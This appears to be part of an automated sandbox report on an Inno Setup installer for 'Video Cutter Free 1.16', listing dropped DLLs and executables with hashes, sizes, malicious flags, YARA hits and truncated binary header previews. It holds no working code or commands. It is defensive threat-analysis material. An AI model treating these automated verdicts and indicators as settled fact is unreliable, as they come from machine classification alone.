                                                                            SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                            SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):23312
                                                                            Entropy (8bit):4.596242908851566
                                                                            Encrypted:false
                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):265728
                                                                            Entropy (8bit):6.4472652154517345
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                            MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                            SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                            SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                            SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1645320
                                                                            Entropy (8bit):6.787752063353702
                                                                            Encrypted:false
                                                                            SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                            MD5:871C903A90C45CA08A9D42803916C3F7
                                                                            SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                            SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                            SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):265728
                                                                            Entropy (8bit):6.4472652154517345
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                            MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                            SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                            SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                            SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):348160
                                                                            Entropy (8bit):6.542655141037356
                                                                            Encrypted:false
                                                                            SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                            MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                            SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                            SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                            SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4005103
                                                                            Entropy (8bit):6.385094530190864
                                                                            Encrypted:false
                                                                            SSDEEP:49152:ATUC8iCySyQWcZTGswsorvEmYZv71CCxOPSCgauYWMZsUgT43tG8V:4OW0TGswssgv71CjPSCgaupMZa4T
                                                                            MD5:4F7EB0559E2B9E6B02400E66DE5540E8
                                                                            SHA1:8D3A7490C0FD4B5223B6F46E57EB3DCE91FED1CE
                                                                            SHA-256:3D78FA2204DDB073686799F4573C90A9719271FB71902A84985068ED60B7775D
                                                                            SHA-512:17B2C161813AFA28C47AD6603E3B8AD8200A2FE2C0E1132167482203DF4068D2CAE11A5A071925933B798FA5A4AF1BB771596CC8E196DCEBB95F6A43E7EC99E8
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-E132I.tmp, Author: Joe Security
                                                                            Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$..............E...E...E...E...Eu..E...E...E...E...E...E...E ..E.onE...E...E...E1..E...ERich...E........PE..L.....Wg.............................O............@...........................=.....R.=.....................................$........@...!..............................................................................L............................text...z........................... ..`.rdata..$...........................@..@.data....d.......0..................@....rsrc...."...@..."..................@..@.adtt3...."..p....".................`.'.........................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:MS Windows HtmlHelp Data
                                                                            Category:dropped
                                                                            Size (bytes):78183
                                                                            Entropy (8bit):7.692742945771669
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                            MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                            SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                            SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                            SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                            Malicious:false
                                                                            Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1645320
                                                                            Entropy (8bit):6.787752063353702
                                                                            Encrypted:false
                                                                            SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                            MD5:871C903A90C45CA08A9D42803916C3F7
                                                                            SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                            SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                            SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):445440
                                                                            Entropy (8bit):6.439135831549689
                                                                            Encrypted:false
                                                                            SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                            MD5:CAC7E17311797C5471733638C0DC1F01
                                                                            SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                            SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                            SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):176128
                                                                            Entropy (8bit):6.204917493416147
                                                                            Encrypted:false
                                                                            SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                            MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                            SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                            SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                            SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):499712
                                                                            Entropy (8bit):6.414789978441117
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                            MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                            SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                            SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                            SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):645592
                                                                            Entropy (8bit):6.50414583238337
                                                                            Encrypted:false
                                                                            SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                            MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                            SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                            SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                            SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):445440
                                                                            Entropy (8bit):6.439135831549689
                                                                            Encrypted:false
                                                                            SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                            MD5:CAC7E17311797C5471733638C0DC1F01
                                                                            SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                            SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                            SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):499712
                                                                            Entropy (8bit):6.414789978441117
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                            MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                            SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                            SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                            SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):348160
                                                                            Entropy (8bit):6.542655141037356
                                                                            Encrypted:false
                                                                            SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                            MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                            SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                            SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                            SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):645592
                                                                            Entropy (8bit):6.50414583238337
                                                                            Encrypted:false
                                                                            SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                            MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                            SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                            SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                            SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):716789
                                                                            Entropy (8bit):6.514241987335794
                                                                            Encrypted:false
                                                                            SSDEEP:12288:cTPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuIVwRxyFl:APcYn5c/rPx37/zHBA6pDp2mIEiICRxC
                                                                            MD5:175EFFAA31D6EEFEBFCC6DF33BBA0011
                                                                            SHA1:4625EB78AA715BB49BFAF305596A7E5506402119
                                                                            SHA-256:39F139DC1914F1289D4F077B9FCD15C8A03BE4E30CD4910A0B2B5E5F7C4F2F0B
                                                                            SHA-512:3D0EA7214C10BB97E6FDAE451425BB961A2B83C8BFE326339C32E533647545D12F8276573347AE719AD37CD5D092CFFA3ABFB96DDAE622F291E309C65C04E8C7
                                                                            Malicious:true
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................z........................@..............................................@...............................%..................................................................................................................CODE....\y.......z.................. ..`DATA.................~..............@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc...... ......................@..P.rsrc...............................@..P.....................P..............@..P........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:InnoSetup Log Video Cutter Free, version 0x30, 4882 bytes, 445817\user, "C:\Users\user\AppData\Local\Video Cutter Free 1.16"
                                                                            Category:dropped
                                                                            Size (bytes):4882
                                                                            Entropy (8bit):4.74626718688299
                                                                            Encrypted:false
                                                                            SSDEEP:96:VgyWpJ8epmEM+9C+eOIhza7ICSss/LnLI6:VgyWpJRpmE5HIhcICSsAn/
                                                                            MD5:C1F7F9F1B82869293569B2BE05182933
                                                                            SHA1:C34C5A9E8E31BDF2738F3D53535F75393667B2A0
                                                                            SHA-256:6E7A4F61792D2129F802272DBFCE7E0224CDCDC4B995174E4C126F17417ADA27
                                                                            SHA-512:5B0CFE890D14D5EE970BC7BBC5211F73B2761CE67A2B029FFD76E46FE793984B1C46C36A23E69C16E10BCC8EFCC0BC7F3DF003CC7CFBBCDDA4A20BB364001A2A
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):716789
                                                                            Entropy (8bit):6.514241987335794
                                                                            Encrypted:false
                                                                            SSDEEP:12288:cTPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuIVwRxyFl:APcYn5c/rPx37/zHBA6pDp2mIEiICRxC
                                                                            MD5:175EFFAA31D6EEFEBFCC6DF33BBA0011
                                                                            SHA1:4625EB78AA715BB49BFAF305596A7E5506402119
                                                                            SHA-256:39F139DC1914F1289D4F077B9FCD15C8A03BE4E30CD4910A0B2B5E5F7C4F2F0B
                                                                            SHA-512:3D0EA7214C10BB97E6FDAE451425BB961A2B83C8BFE326339C32E533647545D12F8276573347AE719AD37CD5D092CFFA3ABFB96DDAE622F291E309C65C04E8C7
                                                                            Malicious:true
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:MS Windows HtmlHelp Data
                                                                            Category:dropped
                                                                            Size (bytes):78183
                                                                            Entropy (8bit):7.692742945771669
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                            MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                            SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                            SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                            SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):176128
                                                                            Entropy (8bit):6.204917493416147
                                                                            Encrypted:false
                                                                            SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                            MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                            SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                            SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                            SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):4005103
                                                                            Entropy (8bit):6.385094908393869
                                                                            Encrypted:false
                                                                            SSDEEP:49152:BTUC8iCySyQWcZTGswsorvEmYZv71CCxOPSCgauYWMZsUgT43tG8V:hOW0TGswssgv71CjPSCgaupMZa4T
                                                                            MD5:F00EE01B4436F8DD28084F015B123ECC
                                                                            SHA1:C3C00505968617B33BF22C2955CA882B2B7E0810
                                                                            SHA-256:7F99B4F27FF33CFCA71F5E5B6645D2DD6F3D0D65CD97421F55317501B444D236
                                                                            SHA-512:BB9B5E2726BB34088D05C1AEA76FDA6973D8349E8F963FA5EFE02347F89F33D1AA69469BF5DBAFBFB255F8CE5E5540867E3027B1FEA3B512BD2ABF04E248DDC0
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.9982598691902655
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:imMQqf6YWk.exe
                                                                            File size:3'915'755 bytes
                                                                            MD5:c9019cfc066b4cf4439ab3fa00ae3ac9
